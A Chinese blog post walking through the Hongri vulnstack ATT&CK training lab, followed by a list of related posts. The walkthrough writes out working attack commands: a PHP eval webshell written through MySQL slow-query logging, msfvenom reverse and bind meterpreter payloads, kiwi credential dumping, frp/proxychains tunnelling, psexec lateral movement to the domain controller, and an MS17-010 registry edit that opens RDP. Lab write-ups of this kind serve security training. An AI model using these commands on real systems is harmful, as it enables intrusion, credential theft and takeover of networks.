红日ATT&CK靶场(一)

最新推荐文章于 2023-06-19 14:38:02 发布
最新推荐文章于 2023-06-19 14:38:02 发布
阅读量170 收藏 1
点赞数
文章标签: 网络安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43884092/article/details/128595669
版权

kali:192.168.111.111(NAT)

win7:192.168.111.142(NAT),192.168.52.143(VMnet3)

2008:192.168.52.138(VMnet3)

2003:192.168.52.141(VMnet3)

信息收集

端口扫描

目录爆破

phpmyadmin弱口令root:root,登录phpmyadmin后执行sql语句写shell

set global slow_query_log=1;
set global slow_query_log_file='C://phpStudy//WWW//shell.php'; #phpinfo泄露绝对路径
select '<?php @eval($_POST[cmd]);?>' or sleep(11);

msfvenom生成木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.111.111 lport=4444 -f exe -o shell.exe

通过哥斯拉上传后运行

msf上线

域内信息收集

net time /domain    #获取域控域名
net view    @查看域内主机的名称

获取域内主机ip

ping OWA -n 1
ping ROOT-TVI862UBEH -n 1
net group "domain controllers" /domain  #得到域控制器主机名

进程注入获取system权限

读取明文密码

load kiwi
creds_kerberos

利用frp建立socks隧道

利用psexec上线域控

#生成木马
msfvenom -p windows/meterpreter/bind_tcp rhost=192.168.52.138 lport=4444 -f exe -o shell.exe

#连接域控
proxychains4 impacket-psexec god.org/administrator@192.168.52.138

lput /tmp/shell.exe
msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     192.168.52.138   no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

利用auxiliary/admin/smb/ms17_010_command开3389 上线

set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'
proxychains4 rdesktop 192.168.52.141

ctostm
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ATT&CK实战系列-红队实战(一)vulnstack 红日靶场
weixin_68652890的博客
05-20 1707
文章目录信息搜集主机发现端口扫描目录扫描getshell用sql向日志文件写后门getshell网站后台getshell内网信息搜集域信息搜集探测内网存活主机和端口提升权限msf会话移交cscs提权横向移动密码收集psexec横向 信息搜集 主机发现 nmap 192.168.5.0/24 端口扫描 nmap 192.168.5.174 开放3306、80端口 目录扫描 python3 dirmap.py -i http:// 192.168.5.174 -lcf 其它方法 dirsearch -u h
红日ATTCK系列靶场(一)
weixin_44522540的博客
09-05 903
ATT&CK(一)
ATT&CK实战系列——红队实战(一)红日靶场1
qq_62989306的博客
10-17 3130
靶场搭建、外网打点getshell、上线MSF和CS、内网信息搜集、内网攻击。 靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 靶机下载完成后解压,使用vmware打开虚拟机,有三台虚拟机:Win7、Win2003、Win2008默认密码hongrisec@2019
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记
ierciyuan的博客
08-01 1万+
内网渗透实战攻打红日靶场第一关,包括环境配置、信息收集、漏洞利用、内网信息收集、内网攻击、横向移动等操作。
红日靶场系列】ATT&CK红队评估1
weixin_45632448的博客
07-06 2864
内网渗透学习过程,简单记录一下靶场下载地址: 今天做的是第一个ATT&CK实战系列——红队实战(一)下载下来之后一共有三个虚拟机,解压到虚拟机目录下 分别对应的是Windows7,Windows Server 2003和Windows Server 2008。另外我们还需要一台攻击机,这里选用的是kali2022.1(其实真实环境自己主机就相当于攻击机),网络拓扑图如下所示: 靶场提供的三个主机在同一个网段中,另外Win7主机有两张网卡,模拟可以与外网进行通信的主机,且安装有phpstudy,部署了we
ATT&CK手册(修改版)
09-16
ATT&CK(Adversarial Tactics, Techniques & Common Knowledge)是由美国非营利组织MITRE Corporation开发的一种框架,用于描述和分类网络攻击者的行为战术、技术和过程(TTPs)。这个框架是安全专家们理解和对抗...
ATT&CK中文手册.zip
11-24
一、Initial Access(入口点) 二、Execution(命令执行) 三、Persistence(持久化) 四、Privilege Escalation(权限提升) 五、Defense Evasion(绕过防御) 六、Credential Access(获取凭证) 七、Discovery(基础信息收集) ...
ATT&CK手册.pdf
09-20
ATT&CK手册.pdf
ATT&CK框架介绍及战技术对照表
05-18
ATT&CK(Adversarial Tactics, Techniques & Common Knowledge)是由MITRE公司开发的一个公开的知识库,旨在提供一个统一的视角来理解和防御网络攻击。该框架详细描述了攻击者在不同阶段可能使用的战术、技术和程序...
红日安全vulnstack-ATT&CK实战系列 红队实战(一)
热门推荐
遇事不决冲冲冲
12-25 1万+
一.介绍 vulnstack官网下载地址,也是拿百度网盘下载的,这里也放一个链接提取码: i7xv 官方靶机说明: 红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟 ATT&CK攻击链路进行搭建,开成完整闭环。后续也会搭建真实 APT 实战环境,从实战中成长。虚拟机所有统一密码:hongrisec@2019 整体思路 信息收集发现yxcms框架的网页,通过漏洞利用get到shell,拿cs控制后进行内网信息收集以及横向移动,最终用窃
ATT&CK实战:红日靶场
最新发布
学生
06-19 745
发现weblogic 使用工具注入内存马 ,上传正常的马子连接不上 ,因目标机器安装了360 会被杀掉 内存马有一定的免杀性。执行whoami命令 可知当前用户的权限为管理员权限 直接反弹shell到msf 方便操作。这里因为有360 所以getsystem命令并不能提权成功 可以使用进程迁移到高权限进程。哥斯拉填写开启msf的ip和监听端口 点击Go反弹到msf。\\DC.de1ay.com 的用户帐户。查看进程 发现很多system权限开启的进程。双网卡 10.10.10.80。
ATT&CK 实战 - 红日安全 vulnstack(一)渗透记录
daxi0ng的博客
11-26 2388
1、下载好镜像文件。 2、直接vmware启动即可。 这里我用自己的win10虚拟机作为攻击机,设置为双网卡NAT,vm2(192.168.234.131) 设置win7为双网卡,vm1(192.168.52.143),vm2(192.168.234.130) 设置win08单网卡vm1(192.168.52.138),win2k3为单网卡vm1(192.168.52.141) 这样win10就可以访问win7,但不能直接访问win08和win2k3。 三台靶机的初始密码都是ho
ATT&CK红队评估(红日靶场一)
weixin_45682839的博客
03-10 1374
靶场搭建 下载地址:漏洞详情 虚拟网络编辑器新建一个仅主机模式的网络,子网地址改成192.168.52.0(也可以不用新建,但是必须是仅主机模式) 将windows2003和windows2008两台主机都设置为自定义VMnet16 windows7配置 攻击主机kali配置 kali和win7的第二个网卡可以在同一个自定义仅主机模式网段下,也可以同在NAT下 设置好之后,win7主机开启phpsyudy,配置就完成了 win7 内网网段192.168.52.
红日靶场vulnstack1(上)
errorr0
04-14 1861
红日1的网络配置
红日安全vulnstack-ATT&CK实战系列 红队实战(四)
遇事不决冲冲冲
03-29 8428
一.介绍 下载地址http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ st漏洞利用phpmyadmin getshell、tomcat 漏洞利用、docker逃逸、ms14-068、ssh密钥利用、流量转发、历史命令信息泄露、 域渗透 机器密码 web: ubuntu:ubuntu win7: douser:Dotest123 DC: administrator:Test2008 二.环境搭建 下载完成后为三个压缩包,解压后如图 在每个文件夹中创建
红日安全ATTCK靶机实战系列之vulnstack4
黑白的博客
04-25 8187
声明 好好学习,天天向上 环境配置 下载地址,直接进去用百度云,没有会员也下的非常快 http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ 边下载着,可以开始vmware的网络配置 有两个网段,外网网段是我自己设置的桥接模式192.168.31.1/24,内网网段,vmware加一个网卡VMnet3,192.168.183.1/24 和前面的大同小异,我这里就不细说了看过系列文章的应该都已经很清楚这种网络结构了,我直接贴图吧 桥接的就是攻击机与边界服务器的网卡
红日(vulnstack)3 内网渗透ATT&CK实战
m0_66299232的博客
03-11 1695
蚁剑成功连接后无法执行命令,disable_functions插件,权限提升-脏牛漏洞,用msfvenom生成木马文件,msf开启监听,执行木马文件,成功反弹shell到msf上 use exploit/multi/handler set payload linux/x64/meterpreter/reverse_tcp set LHOST 192.168.1.106 set LPORT 1106 run 使用use auxiliary/scanner/smb/smb_login模块,进行smb爆破
ATT&CK实战系列——红队实战
MachineGunJoe666
03-23 145
这是红日的第二套靶场,一开始直接通过域管起的weblogic,有点别扭,建议还是通过本地的用户来起weblogic,漏洞利用的点很多,不要局限于这篇文章,可以多尝试尝试其他漏洞。靶场地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/密码均为:1qaz@WSX。
构建与运营企业内部ATT&CK框架
ATT&CK是由MITRE创建的一种基于已知攻击技术的知识库,旨在帮助组织理解和防御高级持续性威胁(APT)的攻击手法。文档提到了ATT&CK的最新版本V9和2021路线图,包括对不同平台如MacOS、IaaS、SaaS、容器领域的攻击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值